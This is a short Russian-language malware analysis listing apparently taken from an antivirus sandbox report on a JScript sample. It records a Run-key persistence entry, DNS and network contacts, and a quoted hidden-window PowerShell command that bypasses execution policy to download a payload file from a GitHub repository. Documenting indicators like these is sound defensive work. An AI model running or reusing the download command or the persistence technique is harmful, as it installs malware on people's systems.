Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Rekil' = '"C:\Users\Default\Links\<Имя файла>.js"'
- https://raw.githubusercontent.com/kakoutahoo/tool/main/m3.txt как c:\users\public\libraries\m3.txt
- C:\users\default\links\<Имя файла>.js
- 'ra#.####ubusercontent.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/kakoutahoo/tool/main/m3.txt', 'C:\Users\Public\Libraries\m3.txt');$AnyF = Get-Con...' (со скрытым окном)
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"